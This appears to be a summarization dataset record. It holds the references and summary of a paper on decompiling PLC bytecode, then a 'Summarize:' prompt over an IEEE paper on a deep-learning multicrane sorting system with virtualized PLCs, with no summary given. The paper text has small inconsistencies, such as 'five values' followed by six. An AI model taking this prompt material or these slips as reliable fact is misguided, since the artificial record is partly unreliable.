[3] R. S. H. Piggin, "Development of industrial cyber security standards: IEC 62443 for SCADA and Industrial Control System security," pp. 1-6.
[4] R. Langner, "Stuxnet: Dissecting a Cyberwarfare Weapon," IEEE Security & Privacy Magazine, vol. 9, no. 3, pp. 49-51, 2011.
[5] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection," pp. 81-85.
[6] S. A. Milinkovic and L. R. Lazic, "Industrial PLC security issues," pp. 1536-1539.
[7] H. Senyondo, P. Sun, R. Berthier, and S. Zonouz, "PLCloud: Comprehensive power grid PLC security monitoring with zero safety disruption."
[8] G. Cebrat, "Web Based Home Automation: Application Layer Based Security for PLC Controller," pp. 302-307.
[9] E. A. Emerson, The Beginning of Model Checking: A Personal Perspective. Springer-Verlag, 2008.
[10] B. Schlich, J. R. Brauer, J. R. Wernerus, and S. Kowalewski, "Direct model checking of PLC programs in IL," pp. 28-33.
[11] O. Pavlovic and H. D. Ehrich, "Model Checking PLC Software Written in Function Block Diagram," pp. 439-448.
[12] S. McLaughlin, "A Trusted Safety Verifier for Process Controller Code."
[13] B. Zhu and S. Sastry, "SCADA-specific Intrusion Detection/Prevention Systems: A Survey and Taxonomy."
[14] N. Erez and A. Wool, "Control variable classification, modeling and anomaly detection in Modbus/TCP SCADA systems," International Journal of Critical Infrastructure Protection, vol. 10, pp. 59-70, 2015.
[15] J. Jiang and L. Yasakethu, "Anomaly Detection via One Class SVM for Protection of SCADA Systems," pp. 82-88.
[16] B. Kroll, D. Schaffranek, S. Schriegel, and O. Niggemann, "System modeling based on machine learning for anomaly detection and predictive maintenance in industrial plants," pp. 275-280.
[17] IEC 1131-3, Programmable Controllers - Part 3: Programming Languages, International Electrotechnical Commission, Geneva, 1993.
[18] Siemens, S7-200 Programmable Controller System Manual.
[19] M. Xu, "Research on Static Disassembly Algorithm," Computer & Digital Engineering, 2007.
[20] http://download.csdn.net/detail/bretch/2574792
Summary:
Programmable logic controllers (PLCs) are the kernel equipment of industrial control systems (ICSs), as they directly monitor and control industrial processes. Recently, ICSs have been suffering from various cyber threats, which may lead to significant consequences due to their inherent characteristics. In IT systems, decompilation is a useful method to detect intrusions or to discover vulnerabilities; however, it has not yet been developed for ICSs. In this work, we present a technique to decompile the bytecode of PLC programs. By introducing an instruction template and an operand template, we propose a decompiling framework, which is validated on 11 PLC programs. In the disassembling experiments, the presented framework covers all instructions with disassembling accuracy reaching 100%, which shows that our framework is able to effectively decompile the bytecode of PLC programs.
|
Summarize:
Index Terms: Backpropagation (BP) neural network, deep learning, intelligent manufacturing, linear interpolation, virtualized programmable logic controllers (PLCs), visual sorting system.

I. INTRODUCTION

INTELLIGENT manufacturing [1] has recently received increasing attention from both academia and industry worldwide; it is necessary to integrate it with many emerging technologies, such as artificial intelligence (AI) [2], [3], 5G [4], and edge computing [5], to improve the architecture of the Industrial Internet. In particular, this intellectualization drives development in the unmanned direction and transforms industrial chains. The hierarchical architecture of the industrial automation pyramid is introduced in Fig. 1, which consists of five levels: the field level, control level, supervisory level, operation level, and enterprise level from the bottom to the top [6], [7]. The field data are processed level by level, which cannot effectively apply emerging technologies in the industrial architecture and seriously influences the effectiveness and timeliness of urgent applications. The control level occupies an important position in the pyramid structure; it uses programmable logic controllers (PLCs) [8] that sense the inputs, execute the developed program, and write the outputs. For example, PLCs control the speed of cranes and facilitate the collection of the materials on the conveyor belt through suction in industrial visual sorting systems. However, traditional PLCs cannot realize data interworking between devices because of different industrial control protocols. It is difficult to meet flexible and scalable deployment requirements with traditional PLCs, which have high costs. Furthermore, emerging technologies are difficult to implement in industrial control systems. The control function needs to be virtualized and to cooperate with AI applications in the cloud to meet the requirements of Industry 4.0 [9].
Visual sorting systems [10] occupy an important position in intelligent manufacturing due to the development of deep learning [11]. Specifically, multicrane visual sorting systems with cooperation have attracted more interest because of their massive applications in iron mining, steel metallurgy, coal mining, and other fields.

1551-3203 © 2023 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See https://www.ieee.org/publications/rights/index.html for more information.
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:20 UTC from IEEE Xplore. Restrictions apply.
FU et al.: MULTICRANE VISUAL SORTING SYSTEM BASED ON DEEP LEARNING WITH VIRTUALIZED PLCs

Fig. 1. Hierarchical architecture of the industrial automation pyramid.

Multicrane visual sorting systems have two main critical technologies: object detection [12], which aims to recognize the type of the object and obtain its pixel coordinates, and coordinate conversion [13], which aims to get the world coordinates of all materials. However, many key technology challenges remain due to the high-precision and reliability requirements of the systems. In addition, the devices in the visual sorting system are controlled by PLCs, which need to cooperate to complete the sorting task. To address the above challenges, this article improves the hierarchical architecture of the industrial automation pyramid, as shown in Fig. 1. The function of traditional PLCs is virtualized so that it can be flexibly employed in the field or the cloud for interworking equipment. The number of PLCs can be set arbitrarily according to CPU resources. The data of low-level devices can be sent to the cloud to support AI applications. The results of the AI platform are transmitted to cloud PLCs (C-PLCs) that conduct the operation of field devices.
In addition, we develop a deep-learning-based multicrane visual sorting system, which is able to accurately locate and suck up the material on the conveyor belt. Virtualized PLCs are applied to conduct the cranes in a time-sensitive network (TSN) environment for highly reliable and stable control. Deep-learning-based methods and camera calibration approaches are used to locate and recognize materials. The main contributions can be summarized as follows.

1) The C-PLCs and field virtualized PLCs (F-vPLCs) are developed in the cloud and the field instead of traditional hardware PLCs, which can break data islands and realize collaboration between low-level devices.
2) AI algorithms are integrated into the industrial control system, in which the cooperation between the visual recognition model and the virtualized PLCs is completed to control the multiple cranes and suck up the materials.
3) In the visual sorting system, the you only look once (YOLOv5) algorithm is utilized to obtain the types and pixel coordinates of the objects. A new linear-interpolation-based backpropagation (BP) network is proposed to optimize the transformation between the pixel coordinate system and the world coordinate system.
4) A multicrane visual sorting experimental platform is established to verify the proposed methods. Abundant experimental results demonstrate the performance of the whole framework.

The rest of this article is organized as follows. Section II presents the related work concerning the evolution of PLCs, object detection, and camera calibration. Section III introduces the deployment of virtualized PLCs, the multicrane visual sorting system, and the visual recognition algorithms. Section IV presents a large number of experimental results and analyses. Finally, Section V concludes this article.

II. RELATED WORK

With the flexibility and scalability requirements of intelligent manufacturing, it is necessary to explore an integrated method to break the data island and improve the coordination among devices.
Many control function methods have been proposed. A PLC programming environment based on a virtual plant was proposed to provide efficient construction processes in discrete event systems, which supported the specification of discrete event models in a hierarchical, modular manner [14]. Real hardware PLCs based on real plants were designed to connect a 3-D layout model and a control program [15]. Cloud-based software PLCs were introduced to achieve improved scalability and multitenancy performance [16], in which the devices and sensors were connected to the cloud through the OPC-UA protocol [17] and controlled by software PLCs that could dynamically scale and assign workloads. A novel virtual-PLC approach was demonstrated to prevent significant remote attack perturbation in industrial control systems [18]. However, the above PLCs cannot be deployed both on the cloud and in the field and do not have AI application capabilities. There are massive numbers of devices in the factory, many of which are required to cooperate with each other on the same task; for instance, in a multicrane visual sorting system, each crane needs to work cooperatively. It is necessary to research virtualized PLCs that cooperate with emerging technologies for Industry 4.0.

IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024

In a multicrane visual sorting system, the materials on the conveyor belt need to be located and recognized. Convolutional neural network (CNN) based algorithms [19] have been widely used in object detection and classification and have achieved excellent performance in computer vision [20].
There are two main series of methods: the one-stage algorithms in the YOLO [21] architecture series and the single-shot multibox detector [22] architecture series, and the two-stage algorithms in the faster region-based convolutional network (R-CNN) [23] architecture series. An edge-intelligence-based improved YOLOv4 framework that included a channel attention mechanism and a high-resolution network was proposed to improve vehicle detection [24]. Faster R-CNN was applied to automatically classify wheel hubs and send them to the correct operation location in production lines with high detection accuracy [10]. A single-stage grasp detection framework based on a region proposal network architecture was designed for a robotic grasp system, the network complexity of which was lower than that of a two-stage architecture [25]. However, these object detection methods are used in wheel hub location and robotic grasp tasks and are unsuitable for multicrane sorting systems. Compared with two-stage algorithms, the YOLO architecture series achieves significant performance and complexity improvements. Due to the requirements of high accuracy and timeliness, a fast detection algorithm [26] should be considered in the intelligent multicrane system for further enhancement. Additionally, there are many improved camera calibration methods [27]. Zhang [28] proposed the most typical camera calibration method, which executes transformations between the pixel coordinate system and the world coordinate system via different transformation matrices. An inverse matrix is a kind of complex nonlinear transformation that can be fitted by a neural network, and such a matrix performs very well in complicated nonlinear mapping cases. Sheng et al. [29] proposed a BP-neural-network-based camera calibration method to reconstruct 3-D coordinates from pixels under an image coordinate system.
A CNN-based camera calibration method was proposed to recognize checkerboard corners and obtain the mean square error (MSE) per image [30]. However, these methods only consider the pixel coordinates at the corners of the checkerboard, and more points need to be considered, especially for deep-learning-based methods.

III. MULTICRANE VISUAL SORTING SYSTEM WITH VIRTUALIZED PLCS

A. Flexible Deployment of Virtualized PLCs

We develop a flexible deployment framework of virtualized PLCs in Fig. 2, in which F-vPLCs and C-PLCs are set in the field and the cloud, respectively. The low layer relates to input/output modules that consist of field components and industrial personal computers (IPCs). There are massive numbers of devices, such as electric machinery, conveyor belts, cranes, transducers, automated guided vehicles, and other sensors in the industrial process, which must be connected to the network.

Fig. 2. Flexible deployment framework of virtualized PLCs in the field and the cloud.

We employ many F-vPLCs in the IPCs that control the running of low-level devices and support Modbus, EtherCAT, PROFINET, Powerlink, and other protocols [31]. The communication network can be a wired network, such as TSN, or a wireless network, such as a 5G-TSN bridge. In the experiments, we initially use TSN as the data transmission channel for low-latency, ultrareliable, and deterministic communications. On the cloud, we employ a C-PLCs server, such as an X86 server and an AI server. The number of C-PLCs mainly depends on the CPU resources. The vision module on the AI server obtains the video stream from the camera and processes the data to obtain the types, positions, and timestamps of the materials in the multicrane visual sorting system, the results of which are transmitted to the C-PLCs server. A transmission control protocol [32] link is established between the AI server and the C-PLCs server.
Moreover, the AI server clock needs to be synchronized with the C-PLCs clock, because the moving distance and sorting position of the crane are calculated from the time difference between the C-PLCs server and the AI server. We use the network time protocol (NTP) [33] to synchronize them in this system. Both the C-PLCs server and the AI server are designed as NTP clients, which are synchronized with the NTP server to achieve indirect time synchronization. The synchronization time of NTP is less than 1 ms, which hardly affects the operation of the whole system.

Fig. 3 shows the structure of the virtualized PLC, which consists of the server, operating system, runtime, and integrated development environment (IDE). The common servers are X86 servers on the cloud or IPCs in terminals. An X86 server for the C-PLCs and IPCs for the F-vPLCs are used in the multicrane visual sorting system. Both Windows and Linux operating systems are supported; the Linux operating system is adopted in the experiments. Docker is used as the runtime so that virtual PLCs can be integrated and deployed flexibly in the field and on the cloud.

Fig. 3. Example of the virtualized PLC.

Fig. 4. Framework of the intelligent multicrane visual sorting system.

In the IDE, we can develop many modules, including cloud-edge-terminal collaborative deployment, computing resource management, and multitask distributed scheduling. Once the data and control function are improved in the cloud, AI algorithms can be combined with them to realize industrial intelligence and unmanned control. Finally, a multicrane visual sorting system is established in which the flexible deployment of virtualized PLCs is conducted to control the devices.

B.
Multicrane Visual Sorting System Based on Deep Learning With Virtualized PLCs

In this section, we design a multicrane visual sorting system based on deep learning with virtualized PLCs, the framework of which is illustrated in Fig. 4. There are four core modules: the material conveyance module, object detection module, camera calibration module, and control module. First, the material conveying module uses a conveyor belt to transport materials, and one camera is fixed on the cranes to capture images of the materials in the field. Then, the images are sent to the object detection module on the AI server, which utilizes intelligent methods to process the data and obtain the positions and types of the materials on the conveyor belt. Here, each position is represented as pixel coordinates, which cannot be given to the PLCs and need to be converted to world coordinates. Next, a new camera calibration module on the AI server is designed to change the pixel coordinates into world coordinates. Afterward, the world coordinates, types, and timestamps of the materials are transmitted to the control module, in which the C-PLC sends commands to the F-vPLCs. Finally, the F-vPLCs control two cranes that suck up the materials and place them in the designated boxes. There are two critical components in the visual sorting system: the visual recognition algorithm and the camera calibration method, which seriously affect the sorting accuracy. Hence, we mainly introduce the object detection module and the camera calibration module as follows.

Fig. 5. Structure of YOLOv5 for material detection in the visual sorting system.

C. Object Detection Module

We apply the YOLOv5 algorithm to detect and recognize the materials on the conveyor belt. The architecture of YOLOv5, as shown in Fig. 5, consists of three main parts: backbone, neck, and prediction. The backbone extracts the salient features of the input images.
A cross-stage partial network [34] is integrated into Darknet [35] to create CSPDarknet as the backbone of YOLOv5. Compared with Darknet53 in YOLOv3, CSPDarknet53 performs significantly better in terms of computation time and detection accuracy.

The purpose of the neck is to generate feature pyramids and recognize the same object through multiscale feature fusion. A path aggregation network (PAN) [36] is used in the neck, which can easily connect the feature grid and all feature layers. Compared with the feature pyramid network [37] in YOLOv3, PAN obtains more useful features from both the low and high layers.

The prediction module outputs vectors that consist of the coordinates, classification result, and confidence score of the predicted bounding box, the same as in YOLOv3. Finally, the positions and types of the materials on the conveyor belt are obtained. We compare the performance of YOLOv3 and YOLOv5 on the visual recognition module.

The output of YOLOv5 predicts five values (x_1, y_1, x_2, y_2, C, P) for each bounding box: (x_1, y_1) denotes the lower left corner coordinates and (x_2, y_2) the upper right corner coordinates of the bounding box, C is the classification of the bounding box, and P is the confidence score that reflects how accurately the bounding box is predicted. These five values are used to calculate the loss that optimizes the network.

3730 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 20, NO. 3, MARCH 2024

The total loss of
YOLOv5 consists of a regression loss, a classification loss, and a confidence loss.

Regression loss: The diagonal coordinates (x_1, y_1, x_2, y_2) of the predicted and truth boxes are used for bounding box regression. The generalized intersection over union (GIoU) [38] method is used as the regression loss to drive the predicted coordinates toward the truth coordinates. Compared with IoU, GIoU solves the problem that the loss provides no gradient when the predicted bounding box and the truth bounding box do not overlap. Let A be the predicted bounding box and B the truth bounding box. IoU is the ratio of the intersection area to the union area of A and B. Let C be the smallest box that includes A and B; GIoU subtracts from IoU the ratio between the part of C not covered by the union and the area of C. The regression loss is

L_{reg} = 1 - \mathrm{GIoU} = 1 + \frac{A_C - A_U}{A_C} - \mathrm{IoU} \quad (1)

where A_C is the area of C, the smallest box that includes A and B, and A_U is the area of the union of A and B.

Classification loss: It aims to recognize and optimize the classification of materials. Binary cross entropy with logits loss [39] is used:

L_{cls} = -\frac{1}{N}\sum_{i=1}^{N}\left[\hat{C}_i \ln(\mathrm{sigmoid}(C_i)) + (1-\hat{C}_i)\ln(1-\mathrm{sigmoid}(C_i))\right] \quad (2)

where N is the size of the minibatch, C_i is the predicted classification, and \hat{C}_i is the classification label.

Confidence loss: It aims to optimize the confidence of the bounding box. We also use binary cross entropy with logits loss as the confidence loss:

L_{con} = -\frac{1}{N}\sum_{i=1}^{N}\left[\hat{P}_i \ln(\mathrm{sigmoid}(P_i)) + (1-\hat{P}_i)\ln(1-\mathrm{sigmoid}(P_i))\right] \quad (3)

where N is the size of the minibatch, P_i is the predicted confidence, and \hat{P}_i \in [0, 1] is the confidence label.

The total loss of YOLOv5 is

L_{total} = L_{reg} + L_{cls} + L_{con}. \quad (4)

D. Typical Camera Calibration Method

Camera calibration [28] aims to describe the connection between the pixel coordinate system and the world coordinate system, which requires three transformations, as shown in Fig. 6. The first is from the pixel coordinate system (u, v) to the image coordinate system (x, y):

\begin{bmatrix} u \\ v \\ 1 \end{bmatrix} = \begin{bmatrix} 1/d_x & 0 & u_0 \\ 0 & 1/d_y & v_0 \\ 0 & 0 & 1 \end{bmatrix} \begin{bmatrix} x \\ y \\ 1 \end{bmatrix} \quad (5)

Fig. 6. Mathematical model of camera calibration.
where (u_0, v_0) is the coordinate of the origin o in the pixel coordinate system, and (d_x, d_y) indicates the number of pixels corresponding to unit length in the image coordinate system.

The second is from the image coordinate system (x, y) to the camera coordinate system (X_c, Y_c, Z_c):

Z_c \begin{bmatrix} x \\ y \\ 1 \end{bmatrix} = \begin{bmatrix} f & 0 & 0 & 0 \\ 0 & f & 0 & 0 \\ 0 & 0 & 1 & 0 \end{bmatrix} \begin{bmatrix} X_c \\ Y_c \\ Z_c \\ 1 \end{bmatrix} \quad (6)

where f is the focal length of the camera.

The last is from the camera coordinate system (X_c, Y_c, Z_c) to the world coordinate system (X_w, Y_w, Z_w):

\begin{bmatrix} X_c \\ Y_c \\ Z_c \\ 1 \end{bmatrix} = \begin{bmatrix} R & T \\ 0^T & 1 \end{bmatrix} \begin{bmatrix} X_w \\ Y_w \\ Z_w \\ 1 \end{bmatrix} \quad (7)

where R is a 3 \times 3 rotation matrix, T is a 3 \times 1 translation matrix, and 0^T is (0, 0, 0).

According to (5)-(7), the relation between the pixel coordinate system and the world coordinate system is

Z_c \begin{bmatrix} u \\ v \\ 1 \end{bmatrix} = A[R, T]P = \begin{bmatrix} f_x & 0 & u_0 & 0 \\ 0 & f_y & v_0 & 0 \\ 0 & 0 & 1 & 0 \end{bmatrix} \begin{bmatrix} R & T \\ 0^T & 1 \end{bmatrix} \begin{bmatrix} X_w \\ Y_w \\ Z_w \\ 1 \end{bmatrix} \quad (8)

where A is the internal parameter matrix of the camera, [R, T] is the external parameter matrix of the camera, and P is a real point in the world coordinate system.

The typical camera calibration method depends heavily on the parameters of the camera, and the error of the inverse transformation is large during the solving process. Equation (8) shows that the relation between the pixel coordinate system and the world coordinate system is complex and nonlinear.

Fig. 7. Comparison of base calibration and linear interpolation-based calibration. (a) The base calibration. (b) The linear interpolation-based calibration.

Fig. 8. Architecture of BP neural network for coordinate transformation.

A BP neural network performs very well at representing such nonlinear relations.
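As a concrete reading of (8), the following Python sketch composes an intrinsic matrix A with an external matrix [R, T] and projects a world point to pixel coordinates. All numeric parameter values here are illustrative assumptions, not the paper's calibrated values.

```python
def matmul(A, B):
    # Naive matrix product for small nested-list matrices.
    return [[sum(a * b for a, b in zip(row, col)) for col in zip(*B)] for row in A]

# Illustrative (assumed) intrinsic parameters for a 1920x1080 camera.
fx, fy = 1000.0, 1000.0      # focal lengths in pixels
u0, v0 = 960.0, 540.0        # principal point
A = [[fx, 0.0, u0],
     [0.0, fy, v0],
     [0.0, 0.0, 1.0]]

# Illustrative (assumed) extrinsics: identity rotation, camera 100 cm above the belt.
R = [[1.0, 0.0, 0.0],
     [0.0, 1.0, 0.0],
     [0.0, 0.0, 1.0]]
T = [0.0, 0.0, 100.0]
RT = [R[i] + [T[i]] for i in range(3)]   # 3x4 external parameter matrix [R, T]

def world_to_pixel(Xw, Yw, Zw):
    """Evaluate Zc * [u, v, 1]^T = A [R, T] [Xw, Yw, Zw, 1]^T from (8)."""
    cam = matmul(RT, [[Xw], [Yw], [Zw], [1.0]])  # camera coordinates; Zc is the last row
    pix = matmul(A, cam)
    Zc = pix[2][0]
    return pix[0][0] / Zc, pix[1][0] / Zc        # (u, v)

u, v = world_to_pixel(5.0, 5.0, 0.0)   # a point one checkerboard square off-axis
```

A point on the optical axis, world_to_pixel(0, 0, 0), maps to the principal point, which is a quick sanity check for any assumed parameter set; the BP network of Section III-E replaces the error-prone inverse of this mapping.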
Therefore, a new linear interpolation-based BP neural network is proposed for camera calibration and compared with the typical camera calibration method.

E. Linear Interpolation-Based BP Neural Network for Camera Calibration

The first step of camera calibration is to make a checkerboard whose black and white squares are each 5 cm x 5 cm, because the unit of the coordinates in the crane system is 5 cm. The comparison between the base calibration and the linear interpolation-based calibration methods is presented in Fig. 7. The red corner points in Fig. 7(a) are the training data for the BP neural network, but the other points are never considered, which can cause large errors when the materials are not at a corner. Therefore, the linear interpolation method is used in Fig. 7(b) to obtain more points, which provides more training data for the BP neural network to establish the relation between the pixel coordinate system and the world coordinate system. This improves the robustness of the BP network in cases with more materials on the conveyor belt.

Fig. 8 shows the architecture of the BP neural network, which consists of ten layers: an input layer, eight hidden layers, and an output layer. In this work, the input is the pixel coordinate (u, v) and the output is the world coordinate (X_w, Y_w, Z_w). The eight hidden layers have 10, 24, 48, 96, 192, 96, 48, and 24 neurons, respectively. The weights w_{ij} between the input layer and the first hidden layer can be taken as a 3 x 10 matrix.

TABLE I. LINEAR INTERPOLATION-BASED BP NEURAL-NETWORK ALGORITHM
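The densification idea of Fig. 7(b) can be sketched in a few lines of Python. The `densify` helper and the sample corner pairs below are illustrative assumptions rather than the authors' implementation, but they follow the text: interpolate between adjacent corner correspondences so that the BP network sees training points beyond the checkerboard corners.

```python
def lerp(p, q, t):
    # Linear interpolation between two 2-D points.
    return tuple(a + t * (b - a) for a, b in zip(p, q))

def densify(pixel_corners, world_corners, n):
    """Insert n extra, evenly spaced (pixel, world) correspondences between
    each adjacent pair of checkerboard corner correspondences."""
    pairs = []
    for (p0, p1), (w0, w1) in zip(zip(pixel_corners, pixel_corners[1:]),
                                  zip(world_corners, world_corners[1:])):
        for k in range(n + 1):            # include the left corner of each segment
            t = k / (n + 1)
            pairs.append((lerp(p0, p1, t), lerp(w0, w1, t)))
    pairs.append((pixel_corners[-1], world_corners[-1]))  # closing corner
    return pairs

# Two adjacent corners, 5 cm apart in world units (one checkerboard square).
pix_corners = [(100.0, 200.0), (140.0, 200.0)]
world_corners = [(0.0, 0.0), (5.0, 0.0)]
training_pairs = densify(pix_corners, world_corners, n=3)  # 5 pairs instead of 2
```

Applied along both axes of a full 10-checkerboard grid, the same interpolation grows the 120 corner correspondences into the larger training set that the network is fitted on.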
The jth neuron's output in the first hidden layer is

O^{(1)}_j = f(W^{T}x + b) = f\left(\sum_{i=1}^{I} w_{ij} x_i + b^{(1)}\right) \quad (9)

where i = 1, 2, 3, j = 1, 2, \ldots, 10, x_i is the coordinate of a feature point (u, v, 1), and b^{(1)} is the bias (b_1, b_2, \ldots, b_j). f is the activation function, a rectified linear unit (ReLU) [40]:

f(x) = \begin{cases} x, & x > 0 \\ 0, & x \le 0 \end{cases} \quad (10)

The neurons' outputs in the other hidden layers take the same form as (9). The nth neuron's output in the output layer is

O^{(9)}_n = f(W^{T}x + b) = f\left(\sum_{m=1}^{M} w_{mn} O^{(8)}_m + b^{(9)}\right) \quad (11)

where m = 1, 2, \ldots, 24 and n = 1, 2, 3. O^{(8)}_m is the mth neuron's output in the last hidden layer, f is again the ReLU function, and b^{(9)} is the bias.

The relation between the pixel coordinate system and the world coordinate system in (8) can thus be replaced by the BP neural network, which fits the nonlinear relationship well. Furthermore, the BP neural network does not need the parameters of the camera to solve the inverse transformation, which would otherwise cause large coordinate conversion errors.

The loss function is the MSE loss [41], which for one point is

\mathrm{MSELoss} = \frac{1}{K}\sum_{k=1}^{K}(\hat{y}_k - y_k)^2 \quad (12)

where \hat{y}_k is the prediction O^{(9)}_n of the BP neural network and y_k is the truth label, i.e., the world coordinate (X_w, Y_w, Z_w) in this article. The value of K is 3. For a minibatch, the total loss used to update the network is the average of all MSE loss values.

The processing approach of the linear interpolation-based BP neural network is shown in Table I.

Fig. 9. Experimental structure of multicrane visual sorting system.

First, the dataset is obtained
from the linear interpolation method. Then, the data are sent to the network and the error is calculated. Next, the parameters are updated in each episode through the BP algorithm. Finally, the world coordinates of all objects are obtained for each frame. After training, we can obtain the loss curve to observe the algorithmic performance, which will be shown in Section IV.

F. Evaluation Methods

In general, precision, recall, and mean average precision (mAP) are the standard metrics for evaluating object detection performance [42]. The precision and recall rate are given by

\mathrm{Precision}\,(\%) = \frac{TP}{TP + FP} \times 100 \quad (13)

\mathrm{Recall\ Rate}\,(\%) = \frac{TP}{TP + FN} \times 100 \quad (14)

where TP denotes the true positives, the number of correctly detected items; FP denotes the false positives, the number of negatives predicted as positive (the commission error); and FN denotes the false negatives, the number of positives predicted as negative (the omission error). Precision is defined as the ratio of true-positive detections to all detections, and the recall rate reflects the sensitivity of the detector.

The per-class AP is given by the area under the precision-recall curve of the detection results, and mAP is the mean AP over all classes; the mAP value reflects the performance of the corresponding object detector. They are computed as

\mathrm{AP}\,(\%) = \sum_{n=1}^{N} p(n)\,\Delta r(n) \quad (15)

\mathrm{mAP}\,(\%) = \frac{\sum_{q=1}^{Q}\mathrm{AP}_q}{Q} \quad (16)

where \Delta r(n) is the distance between adjacent points on the recall-rate axis, p(n) is the precision value corresponding to the nth point on the recall-rate axis, N is the number of points, and Q is the total number of classes.

IV. EXPERIMENTS AND RESULTS

A.
Experimental Platform of the Multicrane Visual Sorting System

In a multicrane visual sorting system, the operation state, movement direction, speed, and other parameters of the conveyor belt and cranes need to be controlled to achieve controllable material sorting. An experimental structure for the multicrane visual sorting system is established, as shown in Fig. 9, which realizes industrial closed-loop control integrating C-PLC and AI technology. The scanning cycle of the C-PLC is 100 ms according to the running programs. One F-vPLC in IPC1 is responsible for controlling one crane over the EtherCAT protocol, and two F-vPLCs in IPC2 are responsible for controlling the other crane over the EtherCAT protocol and the conveyor belt over the Modbus protocol. The scanning cycle of the F-vPLCs is 20 ms, and the cycle of the UDP packets from the C-PLC to the F-vPLCs is 50 ms. The servomotor is a DS5C series module, which drives the cranes to the position of the material. The frequency of the frequency converter in the conveyor belt system ranges from 7.5 to 30 Hz. Ten C-PLCs are deployed on the X86 server, one of which is applied to the visual sorting system. We present and discuss the experimental results for the visual recognition module, the camera calibration module, and the material sorting system as follows.

B. User Interface (UI) of the Multicrane Visual Sorting System

The UI of the multicrane visual sorting system is shown in Fig. 10. It mainly consists of the crane setting module, convey control module, vision state module, style setting module, and crane working state module. The crane setting module is responsible for the working range along the X-axis and for adjusting the velocity and acceleration of the crane. The convey control module controls the run/stop state and the speed of the conveyor belt. The vision state module monitors, via an indicator, the communication connection status between the C-PLC server and the AI server; the displayed delay is the data transmission time from the camera to the C-PLC server, which includes the image transmission time from the camera to the AI server, the visual processing time on the AI server, and the result transmission time from the AI server to the C-PLC server. The style setting module is designed to place materials in an arbitrary shape for each crane according to customer requirements. The crane working state module dynamically displays the current position and movement of the crane along the X-axis in real time. The UI is used to monitor the running status of the whole multicrane system and lets the user set the parameters of the system.

Fig. 10. UI of multicrane visual sorting system.

C. Results of Material Vision Detection

A comparative experiment involving Faster R-CNN, YOLOv3, and YOLOv5 is designed and deployed on PyTorch using NVIDIA 3090 graphics processing units. To improve the robustness of the system, data augmentation methods are applied to the original images, including scaling, color space adjustment, and mosaic augmentation. The number of epochs is 1000 and the batch size is 1 due to the limited dataset. The Adam optimizer [43] is used to learn the representations, with an initial learning rate of 0.001. We collect 201 images of red and black chess pieces; the number of chess pieces in each image is random. More specifically, 141 images are selected for the training set, 30 images for the testing set, and the remaining 30 images for the validation set. After training and testing, the precision, recall rate, and mAP on the training, testing, and validation sets are presented in Table II.
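The metrics in (13)-(16) reduce to a few lines of Python. The numbers below are toy values for illustration, not the results reported in Table II.

```python
def precision(tp, fp):
    # (13): true positives over all detections, in percent.
    return 100.0 * tp / (tp + fp)

def recall(tp, fn):
    # (14): true positives over all ground-truth items, in percent.
    return 100.0 * tp / (tp + fn)

def average_precision(points):
    """(15): area under the precision-recall curve, accumulated over
    recall increments. `points` is a list of (recall, precision) pairs."""
    ap, prev_r = 0.0, 0.0
    for r, p in sorted(points):
        ap += p * (r - prev_r)   # p(n) * delta_r(n)
        prev_r = r
    return ap

def mean_ap(ap_per_class):
    # (16): mean AP over all Q classes.
    return sum(ap_per_class) / len(ap_per_class)

# Toy example: 95 correct detections, 5 false alarms, 5 missed items.
p = precision(95, 5)
r = recall(95, 5)
ap_red = average_precision([(0.5, 1.0), (1.0, 0.8)])
m = mean_ap([ap_red, 0.8])   # two classes, e.g., red and black pieces
```

The same accumulation over recall increments underlies the per-class AP values that the mAP column in Table II averages.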
YOLOv5 achieves the best performance in terms of mAP on the training set and the validation set. Faster R-CNN performs similarly to YOLOv5; its precision and recall rate are close to 100% on the training set and the testing set. YOLOv3 is the worst of the three on all datasets. The overall results prove the effectiveness of YOLOv5 for object detection.

TABLE II. RESULTS OF FASTER R-CNN, YOLOV3, AND YOLOV5 ON THE TRAINING SET, TESTING SET, AND VALIDATING SET

Fig. 11. Processing time per image on Faster R-CNN, YOLOv3, and YOLOv5.

The processing times per image for the three algorithms are presented in Fig. 11. Faster R-CNN and YOLOv3 consume 35.82 and 13.64 ms, respectively, to obtain the position information. YOLOv5 processes one image in 12.15 ms, which is 23.67 and 1.49 ms faster than Faster R-CNN and YOLOv3, respectively. This further proves the strong performance of YOLOv5 in the multicrane visual sorting system. Considering both accuracy and time consumption, we choose YOLOv5 as the visual recognition algorithm and use its recognition results for the subsequent camera calibration.

Fig. 12 illustrates the visual recognition performance of YOLOv5. The numbers on the images are the confidence scores, each of which measures the similarity between the predicted bounding box and the corresponding truth bounding box. All confidence scores are close to 1, which further demonstrates that YOLOv5 performs excellently in the visual sorting system.

Fig. 12. Illustration of the visual recognition results based on YOLOv5.

TABLE III. EXAMPLE OF A AND (R, T) FOR ONE CHECKERBOARD WITH TRADITIONAL CAMERA CALIBRATION

D. Results of Camera Calibration

Ten 5 cm x 5 cm square checkerboards are designed for training and three 5 cm x 5 cm square checkerboards are used for testing.
On one checkerboard, there are 120 points for traditional calibration and for BP with base calibration, and 437 points for BP with linear interpolation calibration. The resolution of the camera is 1920 x 1080. First, traditional camera calibration is conducted, and the parameter matrices (A, R, T) of one checkerboard are shown in Table III.

Five points in the world coordinate system are presented to illustrate the performance of traditional calibration and of BP without and with linear interpolation. The distance errors of these five points are shown in Table IV, where (u, v) are the pixel coordinates, (X, Y) are the truth world coordinates, and (X', Y') are the coordinates predicted by the three algorithms. BP with linear interpolation performs better than traditional calibration: its average distance error is 0.017 cm, which is 0.041 and 0.109 cm less than that of traditional calibration and BP without linear interpolation, respectively, demonstrating the effectiveness of the proposed method.

The comparison between the training losses of the BP neural network with base calibration and with linear interpolation calibration is shown in Fig. 13. The X-axis represents 400 epochs and the Y-axis is the MSE loss on the training dataset. Convergence with linear interpolation is faster than with base calibration: the MSE loss at the 400th epoch is 0.417 for base calibration and 0.175 for linear interpolation calibration. Therefore, linear interpolation-based calibration performs better than base calibration in terms of both convergence speed and accuracy.

Fig. 13. MSE loss comparison of BP with and without linear interpolation.

Fig. 14. Distance error comparison of traditional calibration, BP without and with linear interpolation on three images.

The distance error comparison of traditional calibration and of BP without and with linear interpolation is presented in Fig. 14, which uses three images captured for testing.
